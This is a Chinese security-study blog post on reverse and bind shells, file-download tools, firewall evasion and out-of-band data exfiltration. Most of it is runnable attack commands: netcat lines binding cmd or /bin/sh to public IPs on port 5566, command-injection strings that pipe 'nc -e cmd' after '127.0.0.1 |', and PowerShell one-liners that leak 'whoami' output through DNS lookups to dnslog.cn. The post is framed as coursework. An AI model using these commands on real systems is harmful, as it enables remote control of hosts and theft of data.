web安全学习笔记【05】——反弹Shell、正反向连接

思维导图

#知识点:

1、Web常规-系统&中间件&数据库&源码等

2、Web其他-前后端&软件&Docker&分配站等

3、Web拓展-CDN&WAF&OSS&反向&负载均衡等

-----------------------------------

1、APP架构-封装&原生态&H5&flutter等

2、小程序架构-Web&H5&JS&VUE框架等

-----------------------------------

1、渗透命令-常规命令&文件上传下载

2、反弹Shell-防火墙策略&正反向连接

3、数据回显-查询带外&网络协议层级

#章节点

应用架构:Web/APP/云应用/小程序/负载均衡等

安全产品:CDN/WAF/IDS/IPS/蜜罐/防火墙/杀毒等

渗透命令:文件上传下载/端口服务/Shell反弹等

抓包技术:HTTP/TCP/UDP/ICMP/DNS/封包/代理等

算法加密:数据编码/密码算法/密码保护/反编译/加壳等

演示案例:

  • 实用案例1:文件上传下载-解决无图形化&解决数据传输
  • 实用案例2:反弹Shell命令-解决数据回显&解决数据通讯
  • 实际案例1:防火墙绕过-正向连接&反向连接&内网服务器
  • 实际案例2:防火墙组合数据不回显-ICMP带外查询Dnslog

#常规基本渗透命令详解

https://blog.csdn.net/weixin_43303273/article/details/83029138

#实用案例1:文件上传下载-解决无图形化&解决数据传输

命令生成:https://forum.ywhack.com/bountytips.php?download

Linux:wget curl python ruby perl java等

Windows:PowerShell Certutil Bitsadmin msiexec mshta rundll32等

自己构造

#实用案例2:反弹Shell命令-解决数据回显&解决数据通讯

命令生成:https://forum.ywhack.com/shell.php

1、正向连接:本地监听等待对方连接

Linux控制Windows

windows上面//绑定CMD到本地5566端口(需要下载第三方工具nc)

nc -e cmd -lvp 5566(命令含义:绑定cmd给到本地端口5566)

linux上面//主动连接目标5566(nc自带)

ncat 47.122.23.131 5566

监听任意来自5566端口的

Windows控制Linux

//绑定SH到本地5566端口

ncat -e /bin/sh -lvp 5566(把/bin/sh绑定到本地的5566)

//主动连接目标5566

nc 47.94.236.117 5566

linux将/bin/sh绑定到本地的5566

windows监听linux的5566

2、反向连接:主动给出去,对方监听

//绑定CMD到目标5566端口

ncat -e /bin/sh 47.122.23.131 5566

//等待5566连接

nc -lvvp 5566

//绑定CMD到目标5566端口

nc -e cmd 47.94.236.117 5566

//等待5566连接

ncat -lvvp 5566

linux想要找到某内网环境指定某个主机,只能通过反向连接,正向连接只能找到路由的IP地址,下面对应的的服务器找不到,但如果一定要通过正向连接的话,必须知道该服务器的端口号,即端口映射。

实验:通过内网服务器找linux外网服务器

win10:内网ip:192.168.X.107   外网ip:171.X.X.52

外网linux:47.X.X.117

linux控制window

1、正向连接

不在同一个局域网下,主动找找不到107这个内网服务器

连接外网52也连不上是因为52是路由地址,路由地址并没有执行监听的操作

2、反向连接

windows控制linux

正向连接

#实际案例1:防火墙绕过-正向连接&反向连接&内网服务器

管道符:| (管道符号) ||(逻辑或) &&(逻辑与)  &(后台任务符号)

Windows->| & || &&

Linux->; | || & && ``(特有``和;)

例子:

ping -c 1 127.0.0.1 ; whoami

ping -c 1 127.0.0.1 | whoami

ping -c 1 127.0.0.1 || whoami

ping -c 1 127.0.0.1 & whoami

ping -c 1 127.0.0.1 && whoami

ping -c 1 127.0.0.1 `whoami`

linux:

管道符| 执行后面的命令   ||两个命令都执行

加反撇号

 

加;  ping报错 但是woami被执行

windows:(没有;和反撇号)

思考如何将输出的命令反弹到自己电脑上

1、判断windows(执行命令后权限是administrator)

2、windows没有自带的nc(需要上传nc安装nc)

3、想办法上传nc 反弹权限(小迪这里准备好了nc地址 放在自己服务器上面的。由于对方是windows服务器,所以棱角生成的命令对应选择windows的)

执行之后查看windows 已经有nc.exe

4、反弹

开启入站策略,采用反向连接

入站不行只能给出去

Linux:ncat -lvvp 5566

Windows:127.0.0.1 | nc -e cmd 47.94.236.117 5566

开启出站策略,采用正向连接

但是一般防火墙入站没有允许5566通信的话 也连接不上 (出战一般是允许的)

Linux:ncat -e cmd 47.122.23.131 5566

Windows:127.0.0.1 | nc -e cmd -lvvp 5566

正反向反弹案例-内网服务器

只能内网主动交出数据,反向连接

#实际案例2:防火墙组合数据不回显-ICMP带外查询Dnslog

出站入站都开启策略(数据不回显):OSI网络七层

127.0.0.1 | powershell $x=whoami;$x=$x.Replace('\','xxx');$y='.f4an93.dnslog.cn';$z=$x+$y;ping $z

漏洞有,但是数据不回显:

1、反弹shell

2、带外查询

dnslog——反撇号命令(linux可以 但是windows不识别反撇号命令)

确定能执行命令

windows

` ` ;

ping 127.0.0.1 |

为什么要这样写

cmd无法执行whoami

用到powershell变量赋值 把whoami执行结果给变量

此时dnslog还是无法回显 (因为\  所以将\用xxxx替换掉)

结果带有“\” 导致ping无法执行

powershell $x=whoami;$x=$x.Replace('\','xxx');$y='.vpod5d.dnslog.cn';$z=$x+$y;ping $z

127.0.0.1 | powershell $x=ver;$x=$x.Replace('\','xxx');$y='.vpod5d.dnslog.cn';$z=$x+$y;ping $z

  • 20
    点赞
  • 20
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值